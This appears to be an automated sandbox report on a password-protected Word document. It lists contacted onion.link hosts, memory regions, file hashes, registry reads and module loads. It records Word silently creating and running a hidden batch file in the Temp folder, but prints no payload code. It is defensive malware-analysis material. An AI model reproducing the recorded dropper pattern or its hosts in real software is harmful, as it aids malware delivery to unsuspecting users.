Password Protected Microsoft Word Document Analysis

Involved Hosts

Host	Resolved to	Country	City	Protocol
fbbkvm7ezghq4dx3.onion.link	188.166.203.69	NL	Amsterdam	TCP
onion.link	103.198.0.2	SG		TCP

Monitored Processes

Behavior Information - Grouped by Category

Process #1: winword.exe

(Host: 186, Network: 0)

Information	Value
ID	#1
File Name	c:\program files\microsoft office\office15\winword.exe
Command Line	"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE"
Initial Working Directory	C:\Users\hJrD1KOKY DS8lUjv\Desktop\
Monitor	Start Time: 00:00:23, Reason: Analysis Target
Unmonitor	End Time: 00:02:35, Reason: Terminated by Timeout
Monitor Duration	00:02:12

OS Process Information

Information	Value
PID	0x944
Parent PID	0x4e0 (c:\windows\explorer.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	1R6PFH\hJrD1KOKY DS8lUjv
Groups	1R6PFH\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0000f3e9 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 9A0 0x 99C 0x 998 0x 994 0x 990 0x 988 0x 968 0x 958 0x 950 0x 94C 0x 948 0x 9E8 0x 9FC 0x A44 0x A70 0x 808 0x 838

Region

Name	Start VA	End VA	Type	Permissions	Actions
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000040000	0x00040000	0x00043fff	Pagefile Backed Memory	Readable	Region Actions
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	Readable	Region Actions
private_0x00000000000c0000	0x000c0000	0x001bffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000001c0000	0x001c0000	0x001c0fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000001d0000	0x001d0000	0x001d1fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000001e0000	0x001e0000	0x001e1fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000001f0000	0x001f0000	0x001f0fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000200000	0x00200000	0x00200fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000210000	0x00210000	0x0021ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000220000	0x00220000	0x00221fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000230000	0x00230000	0x0023ffff	Private Memory		Region Actions
pagefile_0x0000000000240000	0x00240000	0x00246fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000250000	0x00250000	0x0025ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000260000	0x00260000	0x0035ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000360000	0x00360000	0x00361fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000370000	0x00370000	0x0037efff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000380000	0x00380000	0x00381fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000390000	0x00390000	0x0048ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000490000	0x00490000	0x0058ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000590000	0x00590000	0x005c0fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000005d0000	0x005d0000	0x005f0fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000600000	0x00600000	0x0060ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000610000	0x00610000	0x00797fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000007a0000	0x007a0000	0x00920fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000930000	0x00930000	0x01d2ffff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000001d30000	0x01d30000	0x01e0efff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000001e10000	0x01e10000	0x01e2efff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001e30000	0x01e30000	0x01e4efff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001e50000	0x01e50000	0x01e8ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001e90000	0x01e90000	0x01e9ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001ea0000	0x01ea0000	0x01ec0fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001ed0000	0x01ed0000	0x01eeefff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001ef0000	0x01ef0000	0x01ef0fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000001f10000	0x01f10000	0x01f10fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000001f20000	0x01f20000	0x01f20fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000001f30000	0x01f30000	0x01f34fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000001f40000	0x01f40000	0x01f40fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000001f50000	0x01f50000	0x01f51fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000001f60000	0x01f60000	0x01f60fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000001f70000	0x01f70000	0x01f70fff	Pagefile Backed Memory	Readable	Region Actions
msxml6r.dll	0x01f80000	0x01f80fff	Memory Mapped File	Readable	Region Actions
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db	0x01f90000	0x01fa9fff	Memory Mapped File	Readable	Region Actions
pagefile_0x0000000001fb0000	0x01fb0000	0x01fb0fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000001fc0000	0x01fc0000	0x01fc0fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001fe0000	0x01fe0000	0x0205ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002060000	0x02060000	0x0215ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002170000	0x02170000	0x021effff	Private Memory	Readable, Writable	Region Actions
private_0x00000000021f0000	0x021f0000	0x022effff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002300000	0x02300000	0x023fffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000002400000	0x02400000	0x027f2fff	Pagefile Backed Memory	Readable	Region Actions
sortdefault.nls	0x02800000	0x02acefff	Memory Mapped File	Readable	Region Actions
c_1255.nls	0x02ad0000	0x02ae0fff	Memory Mapped File	Readable	Region Actions
segoeuib.ttf	0x02af0000	0x02b69fff	Memory Mapped File	Readable	Region Actions
private_0x0000000002b70000	0x02b70000	0x02b8efff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002b90000	0x02b90000	0x02badfff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002bb0000	0x02bb0000	0x02bb0fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002bd0000	0x02bd0000	0x02bd0fff	Private Memory	Readable, Writable	Region Actions
kernelbase.dll.mui	0x02bf0000	0x02caffff	Memory Mapped File	Readable, Writable	Region Actions
private_0x0000000002cc0000	0x02cc0000	0x02dbffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002dc0000	0x02dc0000	0x02ddefff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002de0000	0x02de0000	0x02dfefff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002e00000	0x02e00000	0x02efffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002f10000	0x02f10000	0x02f10fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002f20000	0x02f20000	0x02f3efff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002f40000	0x02f40000	0x02f5dfff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002f60000	0x02f60000	0x02f7efff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002f80000	0x02f80000	0x02f9efff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002fa0000	0x02fa0000	0x02fbefff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002fc0000	0x02fc0000	0x02fdefff	Private Memory	Readable, Writable	Region Actions
segoeui.ttf	0x03040000	0x030befff	Memory Mapped File	Readable	Region Actions
private_0x0000000003120000	0x03120000	0x0321ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000003220000	0x03220000	0x03a1ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
staticcache.dat	0x03a20000	0x0434ffff	Memory Mapped File	Readable	Region Actions
private_0x0000000004430000	0x04430000	0x0443ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000004440000	0x04440000	0x0463ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000004640000	0x04640000	0x0473ffff	Private Memory	Readable, Writable	Region Actions
seguisb.ttf	0x04740000	0x047a3fff	Memory Mapped File	Readable	Region Actions
private_0x00000000047f0000	0x047f0000	0x0486ffff	Private Memory	Readable, Writable, Executable	Region Actions
private_0x0000000004870000	0x04870000	0x0496ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000004970000	0x04970000	0x0497ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000004990000	0x04990000	0x0499ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000004a20000	0x04a20000	0x04a9ffff	Private Memory	Readable, Writable, Executable	Region Actions
private_0x0000000004b20000	0x04b20000	0x04b9ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000004ba0000	0x04ba0000	0x04c9ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000004ca0000	0x04ca0000	0x0549ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
arial.ttf	0x054a0000	0x0555cfff	Memory Mapped File	Readable	Region Actions
private_0x0000000005570000	0x05570000	0x0566ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000005730000	0x05730000	0x0582ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000005830000	0x05830000	0x05a2ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000005a30000	0x05a30000	0x05b2ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000005bf0000	0x05bf0000	0x05ceffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000005d60000	0x05d60000	0x05e5ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000005e60000	0x05e60000	0x06e5ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000006fd0000	0x06fd0000	0x0704ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000007220000	0x07220000	0x0729ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000072a0000	0x072a0000	0x0769ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000076a0000	0x076a0000	0x07a9ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000007aa0000	0x07aa0000	0x0829ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000082a0000	0x082a0000	0x086a0fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000086b0000	0x086b0000	0x08ab0fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000008ac0000	0x08ac0000	0x08ec0fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000008ed0000	0x08ed0000	0x092cffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000092d0000	0x092d0000	0x0978ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000037720000	0x37720000	0x3772ffff	Private Memory	Readable, Writable, Executable	Region Actions
msvcp100.dll	0x74060000	0x740f7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcr100.dll	0x74100000	0x741d1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
osppc.dll	0x74570000	0x745a2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x77600000	0x7771efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x77720000	0x77819fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77820000	0x779c8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
psapi.dll	0x779e0000	0x779e6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	Readable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions
winword.exe	0x13f8d0000	0x13faa7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x000007febe730000	0x7febe730000	0x7febe73ffff	Private Memory	Readable, Writable, Executable	Region Actions
private_0x000007fee1e30000	0x7fee1e30000	0x7fee1e39fff	Private Memory	Readable, Writable, Executable	Region Actions
dwrite.dll	0x7feea780000	0x7feea8fdfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
d3d10warp.dll	0x7feea900000	0x7feeaacffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msptls.dll	0x7feeaad0000	0x7feeac45fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msores.dll	0x7feeac50000	0x7feee608fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mso.dll	0x7feee610000	0x7fef07c1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wwlib.dll	0x7fef07d0000	0x7fef2220fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
d3d11.dll	0x7fef2260000	0x7fef2325fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msointl.dll	0x7fef2330000	0x7fef26a5fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wwintl.dll	0x7fef26b0000	0x7fef2783fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
d2d1.dll	0x7fef2790000	0x7fef2871fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
oart.dll	0x7fef2880000	0x7fef3c86fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
riched20.dll	0x7fef4290000	0x7fef44b3fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mscoreei.dll	0x7fef44c0000	0x7fef4558fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msimg32.dll	0x7fef4560000	0x7fef4566fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mscoree.dll	0x7fef4570000	0x7fef45defff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msxml6.dll	0x7fef8dc0000	0x7fef8fb1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winspool.drv	0x7fef9050000	0x7fef90c0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
office.odf	0x7fef9ca0000	0x7fefa163fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msi.dll	0x7fefa170000	0x7fefa485fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
dxgi.dll	0x7fefa900000	0x7fefa9a6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
d3d10_1core.dll	0x7fefa9b0000	0x7fefaa04fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
d3d10_1.dll	0x7fefaa10000	0x7fefaa43fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntmarta.dll	0x7fefb7f0000	0x7fefb81cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wtsapi32.dll	0x7fefba90000	0x7fefbaa0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
windowscodecs.dll	0x7fefbb20000	0x7fefbc49fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
dwmapi.dll	0x7fefbc90000	0x7fefbca7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdiplus.dll	0x7fefbea0000	0x7fefc0b4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
uxtheme.dll	0x7fefc0c0000	0x7fefc115fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
propsys.dll	0x7fefc120000	0x7fefc24bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
comctl32.dll	0x7fefc2a0000	0x7fefc493fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
For performance reasons, the remaining 221 entries are omitted. The remaining entries can be found in flog.txt.

Created Files

Filename	File Size	Hash Values	YARA Match	Actions
c:\users\hjrd1k~1\appdata\local\temp\test.bat	0.34 KB (351 bytes)	MD5: 855f89d5ae86649d772ae945ccdf5084 SHA1: 4ca8a6d7c6e2f1f277c1c99d7f287891f12604bd SHA256: 1bc95054ee38df7db4c4208af2b71eac74d4ce3a1f37403f9a56f68cac31668d		File Actions Show Properties Download
c:\users\hjrd1k~1\appdata\local\temp\~dfc85a57e507447d72.tmp	0.50 KB (512 bytes)	MD5: bf619eac0cdf3f68d496ea9344137e8b SHA1: 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5 SHA256: 076a27c79e5ace2a3d47f9dd2e83e4ff6ea8872b3c2218f66c92b89b55f36560		File Actions Show Properties Download

Host Behavior

Registry (29)

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CLASSES_ROOT\Licenses		1	Fn
Open Key	HKEY_CLASSES_ROOT\CLSID\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}\DesignerFeatures		1	Fn
Open Key	HKEY_CLASSES_ROOT\Clsid\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}\InprocServer32		1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\VBA\VBE\6.0\Addins64		1	Fn
Open Key	Designers		1	Fn
Open Key	ToolboxControls		1	Fn
Read Value	HKEY_CLASSES_ROOT\Licenses\8804558B-B773-11d1-BC3E-0000F87552E7	data = }	1	Fn
Read Value	HKEY_CLASSES_ROOT\Clsid\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}\InprocServer32	value_name = ThreadingModel, data = 65	1	Fn
Read Value	HKEY_CLASSES_ROOT\Clsid\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}\Instance CLSID	data = {C62A69F0-16DC-11CE-9E98-00AA00574A4F}	3	Fn
Read Value		value_name = MdiMaximized, data = 64	1	Fn
Read Value		value_name = GridWidth, data = 224	1	Fn
Read Value		value_name = GridHeight, data = 224	1	Fn
Read Value		value_name = ShowGrid, data = 224	1	Fn
Read Value		value_name = AlignToGrid, data = 224	1	Fn
Read Value		value_name = SaveBeforeRun, data = 16	1	Fn
Read Value		value_name = ShowToolTips, data = 16	1	Fn
Read Value		value_name = CollapseWindows, data = 16	1	Fn
Read Value		value_name = UpgradeVBX, data = 16	1	Fn
Read Value		value_name = ReadOnlyMode, data = 16	1	Fn
Read Value		value_name = BackgroundProjectLoad, data = 16	1	Fn
Read Value		value_name = FolderView, data = 16	1	Fn
Read Value		value_name = Tool, type = REG_NONE	1	Fn
Read Value		value_name = UI, type = REG_NONE	1	Fn
Read Value		value_name = Dock, type = REG_NONE	1	Fn
Read Value		value_name = CtlsShowSelected, data = 16	1	Fn
Read Value		value_name = DsnShowSelected, data = 16	1	Fn
Write Value		value_name = Tool, size = 24, type = REG_BINARY	1	Fn Data

Process (1)

Operation	Process	Additional Information	Success	Count	Logfile
Create	C:\Users\HJRD1K~1\AppData\Local\Temp\test.bat	os_pid = 0xa08, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE		1	Fn

Module (145)

Operation	Additional Information	Count	Logfile
Load	module_name = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL, base_address = 0x7fee9f30000	1	Fn
Get Handle	module_name = c:\windows\system32\msi.dll	1	Fn
Get Handle	module_name = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL	1	Fn
Get Handle	module_name = c:\windows\system32\user32.dll	1	Fn
Get Handle	module_name = oleaut32.dll	1	Fn
Get Handle	module_name = ole32.dll	1	Fn
Get Filename	process_name = c:\program files\microsoft office\office15\winword.exe	3	Fn
Get Address	module_name = c:\windows\system32\msi.dll, function = MsiProvideQualifiedComponentA, address_out = 0x7fefa1f3b3c	1	Fn
Get Address	module_name = c:\windows\system32\msi.dll, function = MsiGetProductCodeA, address_out = 0x7fefa1ea13c	1	Fn
Get Address	module_name = c:\windows\system32\msi.dll, function = MsiReinstallFeatureA, address_out = 0x7fefa1f1618	1	Fn
Get Address	module_name = c:\windows\system32\msi.dll, function = MsiProvideComponentA, address_out = 0x7fefa1ef088	1	Fn
Get Address	module_name = Unknown module name, function = MsoVBADigSigCallDlg, address_out = 0x7feea03d160	1	Fn
Get Address	module_name = Unknown module name, function = MsoVbaInitSecurity, address_out = 0x7fee9faa1e8	1	Fn
Get Address	module_name = Unknown module name, function = MsoFIEPolicyAndVersion, address_out = 0x7fee9f524b8	1	Fn
Get Address	module_name = Unknown module name, function = MsoFAnsiCodePageSupportsLCID, address_out = 0x7fee9faa080	1	Fn
Get Address	module_name = Unknown module name, function = MsoFInitOffice, address_out = 0x7fee9f4f98c	1	Fn
Get Address	module_name = Unknown module name, function = MsoUninitOffice, address_out = 0x7fee9f3ec34	1	Fn
Get Address	module_name = Unknown module name, function = MsoFGetFontSettings, address_out = 0x7fee9f33fac	1	Fn
Get Address	module_name = Unknown module name, function = MsoRgchToRgwch, address_out = 0x7fee9f42878	1	Fn
Get Address	module_name = Unknown module name, function = MsoHrSimpleQueryInterface, address_out = 0x7fee9f37a5c	1	Fn
Get Address	module_name = Unknown module name, function = MsoHrSimpleQueryInterface2, address_out = 0x7fee9f379d4	1	Fn
Get Address	module_name = Unknown module name, function = MsoFCreateControl, address_out = 0x7fee9f3870c	1	Fn
Get Address	module_name = Unknown module name, function = MsoFLongLoad, address_out = 0x7feea07cb48	1	Fn
Get Address	module_name = Unknown module name, function = MsoFLongSave, address_out = 0x7feea07cb6c	1	Fn
Get Address	module_name = Unknown module name, function = MsoFGetTooltips, address_out = 0x7fee9f423e0	1	Fn
Get Address	module_name = Unknown module name, function = MsoFSetTooltips, address_out = 0x7fee9faa480	1	Fn
Get Address	module_name = Unknown module name, function = MsoFLoadToolbarSet, address_out = 0x7fee9f97d64	1	Fn
Get Address	module_name = Unknown module name, function = MsoFCreateToolbarSet, address_out = 0x7fee9f355d0	1	Fn
Get Address	module_name = Unknown module name, function = MsoHpalOffice, address_out = 0x7fee9f405e0	1	Fn
Get Address	module_name = Unknown module name, function = MsoFWndProcNeeded, address_out = 0x7fee9f33cd4	1	Fn
Get Address	module_name = Unknown module name, function = MsoFWndProc, address_out = 0x7fee9f36c80	1	Fn
Get Address	module_name = Unknown module name, function = MsoFCreateITFCHwnd, address_out = 0x7fee9f33d08	1	Fn
Get Address	module_name = Unknown module name, function = MsoDestroyITFC, address_out = 0x7fee9f3eaa0	1	Fn
Get Address	module_name = Unknown module name, function = MsoFPitbsFromHwndAndMsg, address_out = 0x7fee9f3e064	1	Fn
Get Address	module_name = Unknown module name, function = MsoFGetComponentManager, address_out = 0x7fee9f37af0	1	Fn
Get Address	module_name = Unknown module name, function = MsoMultiByteToWideChar, address_out = 0x7fee9f4005c	1	Fn
Get Address	module_name = Unknown module name, function = MsoWideCharToMultiByte, address_out = 0x7fee9f38b00	1	Fn
Get Address	module_name = Unknown module name, function = MsoHrRegisterAll, address_out = 0x7feea03cb3c	1	Fn
Get Address	module_name = Unknown module name, function = MsoFSetComponentManager, address_out = 0x7fee9f447c4	1	Fn
Get Address	module_name = Unknown module name, function = MsoFCreateStdComponentManager, address_out = 0x7fee9f33e0c	1	Fn
Get Address	module_name = Unknown module name, function = MsoFHandledMessageNeeded, address_out = 0x7fee9f3ab58	1	Fn
Get Address	module_name = Unknown module name, function = MsoPeekMessage, address_out = 0x7fee9f3a820	1	Fn
Get Address	module_name = Unknown module name, function = MsoFCreateIPref, address_out = 0x7fee9f315ac	1	Fn
Get Address	module_name = Unknown module name, function = MsoDestroyIPref, address_out = 0x7fee9f3ebfc	1	Fn
Get Address	module_name = Unknown module name, function = MsoChsFromLid, address_out = 0x7fee9f31414	1	Fn
Get Address	module_name = Unknown module name, function = MsoCpgFromChs, address_out = 0x7fee9f365d4	1	Fn
Get Address	module_name = Unknown module name, function = MsoSetLocale, address_out = 0x7fee9f31554	1	Fn
Get Address	module_name = Unknown module name, function = MsoFSetHMsoinstOfSdm, address_out = 0x7fee9f33dbc	1	Fn
Get Address	module_name = Unknown module name, function = MsoSetVbaInterfaces, address_out = 0x7feea03d274	1	Fn
Get Address	module_name = Unknown module name, function = MsoGetControlInstanceId, address_out = 0x7feea0072f4	1	Fn
Get Address	module_name = Unknown module name, function = SysFreeString, address_out = 0x7fefe281320	1	Fn
Get Address	module_name = Unknown module name, function = LoadTypeLib, address_out = 0x7fefe28f1e0	1	Fn
Get Address	module_name = Unknown module name, function = RegisterTypeLib, address_out = 0x7fefe2dcaa0	1	Fn
Get Address	module_name = Unknown module name, function = QueryPathOfRegTypeLib, address_out = 0x7fefe311760	1	Fn
Get Address	module_name = Unknown module name, function = UnRegisterTypeLib, address_out = 0x7fefe3120d0	2	Fn
Get Address	module_name = Unknown module name, function = OleTranslateColor, address_out = 0x7fefe2ac760	1	Fn
Get Address	module_name = Unknown module name, function = OleCreateFontIndirect, address_out = 0x7fefe2decd0	1	Fn
Get Address	module_name = Unknown module name, function = OleCreatePictureIndirect, address_out = 0x7fefe2de840	1	Fn
Get Address	module_name = Unknown module name, function = OleLoadPicture, address_out = 0x7fefe2ef420	1	Fn
Get Address	module_name = Unknown module name, function = OleCreatePropertyFrameIndirect, address_out = 0x7fefe2e4ec0	1	Fn
Get Address	module_name = Unknown module name, function = OleCreatePropertyFrame, address_out = 0x7fefe2e9350	1	Fn
Get Address	module_name = Unknown module name, function = OleIconToCursor, address_out = 0x7fefe2b6e40	1	Fn
Get Address	module_name = Unknown module name, function = LoadTypeLibEx, address_out = 0x7fefe28a550	2	Fn
Get Address	module_name = Unknown module name, function = OleLoadPictureEx, address_out = 0x7fefe2ef320	1	Fn
Get Address	module_name = c:\windows\system32\user32.dll, function = GetSystemMetrics, address_out = 0x777394f0	1	Fn
Get Address	module_name = c:\windows\system32\user32.dll, function = MonitorFromWindow, address_out = 0x77735f08	1	Fn
Get Address	module_name = c:\windows\system32\user32.dll, function = MonitorFromRect, address_out = 0x77732b00	1	Fn
Get Address	module_name = c:\windows\system32\user32.dll, function = MonitorFromPoint, address_out = 0x7772ab64	1	Fn
Get Address	module_name = c:\windows\system32\user32.dll, function = EnumDisplayMonitors, address_out = 0x77735c30	1	Fn
Get Address	module_name = c:\windows\system32\user32.dll, function = GetMonitorInfoA, address_out = 0x7772a730	1	Fn
Get Address	module_name = c:\windows\system32\user32.dll, function = EnumDisplayDevicesA, address_out = 0x7772a5b4	1	Fn
Get Address	module_name = Unknown module name, function = DispCallFunc, address_out = 0x7fefe282270	1	Fn
Get Address	module_name = Unknown module name, function = CreateTypeLib2, address_out = 0x7fefe30dbd0	1	Fn
Get Address	module_name = Unknown module name, function = VarDateFromUdate, address_out = 0x7fefe285c90	1	Fn
Get Address	module_name = Unknown module name, function = VarUdateFromDate, address_out = 0x7fefe286330	1	Fn
Get Address	module_name = Unknown module name, function = GetAltMonthNames, address_out = 0x7fefe2a66c0	1	Fn
Get Address	module_name = Unknown module name, function = VarNumFromParseNum, address_out = 0x7fefe284710	1	Fn
Get Address	module_name = Unknown module name, function = VarParseNumFromStr, address_out = 0x7fefe2848f0	1	Fn
Get Address	module_name = Unknown module name, function = VarDecFromR4, address_out = 0x7fefe2bb640	1	Fn
Get Address	module_name = Unknown module name, function = VarDecFromR8, address_out = 0x7fefe2bb360	1	Fn
Get Address	module_name = Unknown module name, function = VarDecFromDate, address_out = 0x7fefe2c2640	1	Fn
Get Address	module_name = Unknown module name, function = VarDecFromI4, address_out = 0x7fefe2a58a0	1	Fn
Get Address	module_name = Unknown module name, function = VarDecFromCy, address_out = 0x7fefe2a5820	1	Fn
Get Address	module_name = Unknown module name, function = VarR4FromDec, address_out = 0x7fefe2baf20	1	Fn
Get Address	module_name = Unknown module name, function = GetRecordInfoFromTypeInfo, address_out = 0x7fefe2da0c0	1	Fn
Get Address	module_name = Unknown module name, function = GetRecordInfoFromGuids, address_out = 0x7fefe312160	1	Fn
Get Address	module_name = Unknown module name, function = SafeArrayGetRecordInfo, address_out = 0x7fefe2a5af0	1	Fn
Get Address	module_name = Unknown module name, function = SafeArraySetRecordInfo, address_out = 0x7fefe2a5a90	1	Fn
Get Address	module_name = Unknown module name, function = SafeArrayGetIID, address_out = 0x7fefe2a5a60	1	Fn
Get Address	module_name = Unknown module name, function = SafeArraySetIID, address_out = 0x7fefe2a5a30	1	Fn
Get Address	module_name = Unknown module name, function = SafeArrayCopyData, address_out = 0x7fefe2860b0	1	Fn
Get Address	module_name = Unknown module name, function = SafeArrayAllocDescriptorEx, address_out = 0x7fefe283e90	1	Fn
Get Address	module_name = Unknown module name, function = SafeArrayCreateEx, address_out = 0x7fefe2d9f80	1	Fn
Get Address	module_name = Unknown module name, function = VarFormat, address_out = 0x7fefe309b20	1	Fn
